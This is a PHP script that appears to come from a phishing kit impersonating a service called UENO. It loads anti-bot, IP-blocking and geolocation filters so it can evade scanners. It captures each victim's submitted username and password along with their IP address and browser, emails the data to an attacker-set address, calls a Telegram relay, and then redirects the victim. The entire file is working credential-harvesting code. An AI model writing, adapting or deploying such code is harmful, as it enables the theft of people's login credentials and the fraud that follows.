<?php
include('../antibot.php');
include('../antiip.php');
include('../blocker.php');
include('../geoip.php');
include('../useragent.php');
ob_start(); // Start output buffering

include 'email.php';

global $message;

$ip = getenv("REMOTE_ADDR");
$timestamp = date('d/m/Y h:i:s');
$browser = $_SERVER['HTTP_USER_AGENT'];
$message .= "-------------->UENO-User<------------------\n";
$message = "User-agent: ".$_SERVER['HTTP_USER_AGENT']."\nIP: ".$_SERVER['REMOTE_ADDR']."\n"."IP2: ".$_SERVER['HTTP_X_FORWARDED_FOR']."\n".'User: '.$_POST['user']."\n".'Password: '.$_POST['pass']."\n\n";

$subject = "UENO $ip";
$headers = "";

$headers .= "\n";
mail("", "UENO ", $message);
mail($Receive_email, $subject, $message, $headers);

include './telegram.php';

ob_end_clean(); // Clear output buffer

header("Location: ../timer.php");
exit();
?>
